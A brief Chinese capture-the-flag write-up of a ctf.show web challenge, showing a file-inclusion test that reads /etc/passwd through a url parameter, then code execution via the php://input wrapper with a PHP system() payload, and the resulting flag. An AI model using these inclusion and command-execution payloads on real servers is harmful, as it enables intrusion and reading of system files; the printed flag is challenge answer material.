1. 题目描述
题目链接:戳我💋
2. 解题过程
打开容器看到界面如下:

看出来是 php 伪协议
测试下:在浏览器输入:http://b612a756-a075-4f33-ae9a-004b5f8ab4ce.challenge.ctf.show/?url=/etc/passwd

果然是 php 伪协议
打开 burp,设置好代理,准备抓包
GET 请求:?url=php://input
在请求体加上:<?php system ("ls");?>

可以看到有一个 cat_go_go index.php 的文件
再次抓包

获得 flag:ctfshow{56daa016-cf60-4a53-a0c7-89e49aba5772}
3. 所需工具
4. 写在最后
本文完
敬爱与明天🌹